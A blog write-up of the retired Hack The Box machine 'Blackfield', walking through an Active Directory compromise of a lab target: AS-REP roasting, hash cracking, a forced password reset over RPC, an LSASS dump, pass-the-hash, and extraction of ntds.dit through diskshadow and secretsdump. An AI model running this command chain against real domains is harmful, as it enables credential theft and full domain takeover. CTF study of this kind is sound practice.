Hack The Box — Blackfield Write-up

Blackfield info card.

Summary

Blackfield is a Windows box of hard difficulty from Hack The Box platform that was retired at 3 October 2020 at 19:00:00 UTC. By the time I did this box it was rated as 4.9 ⭐️, which depicts its quality and the great experience it provides. The attack vectors exercised in here include SMB enumeration, credentials dumping and Backup/Restore services abuse.

Scanning and Enumeration

After adding an entry in our /etc/hosts file, we perform a typical scanning to check which ports are open.

$ports=$(nmap -p- --min-rate=1000 -T4 blackfield.htb | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
$nmap -p$ports -T4 -Pn -A blackfield.htb

The result is a bunch of open ports, mostly related to Active Directory Domain Services:

PORT     STATE SERVICE       VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-09-05 07:31:55Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=9/4%Time=5F52DB24%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h05m46s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-09-05T07:34:26
|_ start_date: N/A

So, we know that the target runs LDAP, Kerberos, Samba and we’ve got a domain as well (BLACKFIELD.local0). Let’s begin our enumeration with Samba.

SMB

We can use either smbclient or smbmap to enumerate shares, the latter being more verbose and providing more information.

$smbclient -NL blackfield.htbSharename       Type      Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available

As shown in the smbmap output below, we have read access to a non-default share called profiles.

$smbmap -u guest -p '' -H 10.10.10.192
[+] IP: 10.10.10.192:445 Name: blackfield.htb

Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic NO ACCESS Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
profiles$ READ ONLY
SYSVOL NO ACCESS Logon server share

Listing the given share returns the following:

.                           D        0  Wed Jun  3 13:47:12 2020
.. D 0 Wed Jun 3 13:47:12 2020
AAlleni D 0 Wed Jun 3 13:47:11 2020
ABarteski D 0 Wed Jun 3 13:47:11 2020
ABekesz D 0 Wed Jun 3 13:47:11 2020
ABenzies D 0 Wed Jun 3 13:47:11 2020
ABiemiller D 0 Wed Jun 3 13:47:11 2020
AChampken D 0 Wed Jun 3 13:47:11 2020
ACheretei D 0 Wed Jun 3 13:47:11 2020
ACsonaki D 0 Wed Jun 3 13:47:11 2020
... ... ... ...
YVonebers D 0 Wed Jun 3 13:47:12 2020
YZarpentine D 0 Wed Jun 3 13:47:12 2020
ZAlatti D 0 Wed Jun 3 13:47:12 2020
ZKrenselewski D 0 Wed Jun 3 13:47:12 2020
ZMalaab D 0 Wed Jun 3 13:47:12 2020
ZMiick D 0 Wed Jun 3 13:47:12 2020
ZScozzari D 0 Wed Jun 3 13:47:12 2020
ZTimofeeff D 0 Wed Jun 3 13:47:12 2020
ZWausik D 0 Wed Jun 3 13:47:12 2020

These profiles could be related to usernames in Active Directory. So, we can put these names into a text file in order to be used in the next step.

Kerberos

Having created a file called profiles.txt containing the values for the first columnn from the previous output, we can use a tool called GetNPUsers.py, which is part of Impacket. The description of the tool says all about it:

Queries target domain for users with ‘Do not require Kerberos preauthentication’ set and export their TGTs for cracking.

Running the following command we will get TGTs (Ticket-Granting Tickets) in a file called tgts.txt in a format that can be read by hashcat for cracking.

$GetNPUsers.py -outputfile tgts.txt -format hashcat -usersfile profiles.txt -no-pass -dc-ip 10.10.10.192 blackfield.local/

The result is a TGT hash for user support@blackfield.local.

The output from command “cat tgts.txt” showing a TGT hash for user support@blackfield.local.
The output from command “cat tgts.txt” showing a TGT hash for user support@blackfield.local.

Besides that, if we look at the command output we can see that there are other two valid user accounts (audit2020 and svc_backup).

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
...
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
...
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
...
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

Getting a Foothold

We will use hashcat to crack the hash found using RockYou wordlist:

hashcat -a 0 -m 18200 -o cracked.txt tgts.txt rockyou.txt

The -m 18200 option is for Kerberos 5, etype 23, AS-REP hash type. The cracked password is#00^BlackKnight. With this credential we have no extra permission on Samba.

RPC

In this stage, we perform a little more of enumeration, this time using rpcclient. This starts by issuing the command rpcclient -U support blackfield.htb and providing the password.

The command enumdomusers shows another user called lydericlefebvre that hadn’t showed up earlier. The command getdompwinfo returns DOMAIN_PASSWORD_COMPLEX. The fact the domain is configured to allow only complex passwords can be obtained with enum4linux as well:

$enum4linux -u support -p "#00^BlackKnight" -S -d -P -G -k support,audit2020,lydericlefebvre,svc_backup 10.10.10.192...
[+] Password Info for Domain: BLACKFIELD
[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: 41 days 23 hours 53 minutes
[+] Password Complexity Flags: 000001
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 1
...

From the output above, we know that besides using complex passwords, the passwords should also have at least 7 characters in length.

Other commands performed with rpcclient did not show more useful information. One special command that worked, however, guessed from the current username (support), was the command to change another user’s password.

So, we can go ahead and change password for user audit2020 with the following command:

setuserinfo2 audit2020 23 'Pr0blem?'

SMB (again)

Now that we have changed the password for user audit2020, we should check its permissions on Samba shares:

$smbmap -u audit2020 -p 'Pr0blem?' -H blackfield.htb
[+] IP: blackfield.htb:445 Name: unknown

Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic READ ONLY Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
profiles$ READ ONLY
SYSVOL READ ONLY Logon server share

Nice! We have access to forensic share. We can connect to it and see what it is inside.

$smbclient -U 'audit2020%Pr0blem?' //10.10.10.192/forensic

After some navigating through the directories, we can see a file called lsass.zip at memory_analysis folder. It is known that is possible to dump passwords from LSASS (Local Security Authority Subsystem Service), so maybe this file contains something useful.

We can download the file to our machine with:

$smbget -U ‘audit2020%Pr0blem?’ -r smb://10.10.10.192/forensic/memory_analysis/lsass.zip

We are close to own user!

Owning User

After unzipping the downloaded file, we can use pypykatz (a Python implementation of mimikatz) to extract credentials from the dump:

$file lsass.DMP 
lsass.DMP: Mini DuMP crash report, 16 streams, Sun Feb 23 18:02:01 2020, 0x421826 type
$pypykatz lsa minidump lsass.DMP

The result is a NT hash for user svc_backup.

Output from pypykatz showing the NT hash for user svc_backup.
Output from pypykatz showing the NT hash for user svc_backup.

The next step is to use evilwinrm to perform a PtH (Pass-the-Hash) attack:

$evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d

Once connected to the system, just grab the user flag: ff****************************15.

Execution of command evilwinrm to get remote acess to target.
Execution of command evilwinrm to get remote acess to target.

Owning System

We can start our enumeration with whoami /all and viewing information about our current user.

Output from command “whoami /all”.
Output from command “whoami /all”.

Although the current user belongs to Backup Operators group and has SeBackupPrivilege and SeRestorePrivilege privileges, we can’t directly access the file ntds.dit.

The ntds.dit file is a database that stores Active Directory data, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain, so our interest in put our hands on it.

The robocopy command with /b option is for us to copy a file in backup mode.

Diskshadow

In order to have access to ntds.dit we should create a shadow copy for volume C:with diskshadowutility. This way, we can copy the desired file to a temporary location and download it to our machine for analysis.

The server does not accept commands passed directly in the command line, so we should write scripts containing the desired instructions.

We can create two files to keep things organized: one for creating our shadow volume and exposing it to a temporary location, and another for cleaning things up.

The first script is as follows:

set context persistent nowriters
set metadata c:\temp\badbkp.cab
add volume c: alias badbkp
create
expose %badbkp% z:

It will stores metadata at C:\temp\badbkp.cab, which we will read in the second script:

load metadata c:\temp\badbkp.cab
delete shadows volume %badbkp%
reset

Assuming we have created the two scripts in a Linux machine and have named them as ds_unix.txt and ds_clean_unix.txt respectively, we should convert them so that they can be read without issues in our Windows target. We can do this very quickly:

unix2dos -n ds_unix.txt ds.txt
unix2dos -n ds_clean_unix.txt ds_clean.txt

Once the files have been uploaded to the target, we create our shadow copy and expose it to Z:with the command diskshadow.exe /s C:\temp\ds.txt.

Now we can perform the following commands to copy ntds.dit and also the system registries:

robocopy Z:\Windows\NTDS C:\temp ntds.dit /b
reg.exe save hklm\system c:\temp\SYSTEM.bak

Download files and cleanup:

diskshadow.exe /s C:\temp\ds_clean.txt
Remove-Item -path C:\temp -r

Dumping Secrets

From our machine, we can now dump credentials using secretsdump.py:

secretsdump.py -system SYSTEM.bak -ntds ntds.dit LOCAL
Output from secretsdump.py.
Output from secretsdump.py.

Here, we are interested in the hash for Administrator (500). PtH again and grab the root flag: 81****************************e4.

That’s it! Blackfield is awesome in many aspects. I hope you’ve enjoyed your journey!

Offensive security practitioner for fun and open source enthusiast. Sometimes I research or break something.